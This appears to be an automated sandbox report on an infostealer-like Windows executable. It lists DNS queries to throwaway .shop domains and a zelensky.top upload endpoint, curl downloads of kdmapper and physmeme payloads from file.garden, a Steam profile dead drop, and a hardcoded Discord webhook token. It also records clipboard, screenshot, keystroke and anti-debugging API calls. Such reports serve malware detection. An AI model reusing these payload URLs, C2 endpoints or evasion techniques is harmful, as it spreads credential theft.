Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: file.garden
Source: global traffic	DNS traffic detected: DNS query: tiddymarktwo.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop
Source: global traffic	DNS traffic detected: DNS query: fossillargeiw.shop
Source: global traffic	DNS traffic detected: DNS query: coursedonnyre.shop
Source: global traffic	DNS traffic detected: DNS query: strappystyio.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: zelensky.top

Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001D.00000002.1804832305.000002AB18732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: gh3zRWl4or.exe	String found in binary or memory: http://www.houseindustries.com/license
Source: gh3zRWl4or.exe	String found in binary or memory: http://www.houseindustries.com/licenseBurbank
Source: gh3zRWl4or.exe	String found in binary or memory: http://www.houseindustries.com/licenseCopyright
Source: gh3zRWl4or.exe	String found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
Source: powershell.exe, 0000001D.00000002.1814705608.000002AB18ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000032.00000002.2023378514.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000033.00000002.1970639828.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top
Source: msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/
Source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1765228400.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2001097433.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
Source: powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: gh3zRWl4or.exe	String found in binary or memory: https://auth.gg/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: gh3zRWl4or.exe	String found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
Source: curl.exe, 00000005.00000002.1348744210.0000025E1A760000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
Source: curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$
Source: curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
Source: curl.exe, 00000005.00000002.1348744210.0000025E1A79B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binJ
Source: curl.exe, 00000008.00000002.1365439765.000001D6FD250000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binDj
Source: curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binurlrc
Source: powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 0000001D.00000002.1752800619.000002AB106AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i&
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 0000000C.00000002.1399217916.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900A&
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65264
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:65264 version: TLS 1.2

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF674152A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,

0_2_00007FF674152A90

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF674152CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF674152CE0

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF674152A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,

0_2_00007FF674152A90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

12_2_00438E3C

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF67417B2C0 GetAsyncKeyState,exit,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF67417B2C0

System Summary

.NET source code contains very large array initializations

Source: physmeme.exe.8.dr, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 360448

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674174760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF674174760
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF674174BD0

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF67418ADB0: memset,memset,DeviceIoControl,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,

0_2_00007FF67418ADB0

Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674174300	0_2_00007FF674174300
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674174760	0_2_00007FF674174760
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674174BD0	0_2_00007FF674174BD0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67416A160	0_2_00007FF67416A160
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674150960	0_2_00007FF674150960
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674158570	0_2_00007FF674158570
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415C550	0_2_00007FF67415C550
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674170D80	0_2_00007FF674170D80
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674165990	0_2_00007FF674165990
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674155DF0	0_2_00007FF674155DF0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF6741775C0	0_2_00007FF6741775C0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF6741665D0	0_2_00007FF6741665D0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674165220	0_2_00007FF674165220
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67416EA70	0_2_00007FF67416EA70
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674163A70	0_2_00007FF674163A70
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674159250	0_2_00007FF674159250
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674162E50	0_2_00007FF674162E50
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674150E80	0_2_00007FF674150E80
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67414E680	0_2_00007FF67414E680
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674167680	0_2_00007FF674167680
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674161690	0_2_00007FF674161690
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67418DADC	0_2_00007FF67418DADC
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415A2F0	0_2_00007FF67415A2F0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67417B2C0	0_2_00007FF67417B2C0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67417A6D0	0_2_00007FF67417A6D0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674156ED0	0_2_00007FF674156ED0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674179B30	0_2_00007FF674179B30
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67417D730	0_2_00007FF67417D730
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674172F10	0_2_00007FF674172F10
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674158BA0	0_2_00007FF674158BA0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF6741597A0	0_2_00007FF6741597A0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674160BA0	0_2_00007FF674160BA0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF674154820	0_2_00007FF674154820
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415A800	0_2_00007FF67415A800
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67414B875	0_2_00007FF67414B875
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415D470	0_2_00007FF67415D470
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67416F040	0_2_00007FF67416F040
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415A040	0_2_00007FF67415A040
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67418C0B0	0_2_00007FF67418C0B0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67416E4B0	0_2_00007FF67416E4B0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67414F480	0_2_00007FF67414F480
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF6741424F0	0_2_00007FF6741424F0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67415F8F0	0_2_00007FF67415F8F0
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67417ECC0	0_2_00007FF67417ECC0
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0062848E	6_2_0062848E
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006240FE	6_2_006240FE
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_006300B7	6_2_006300B7
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00634088	6_2_00634088
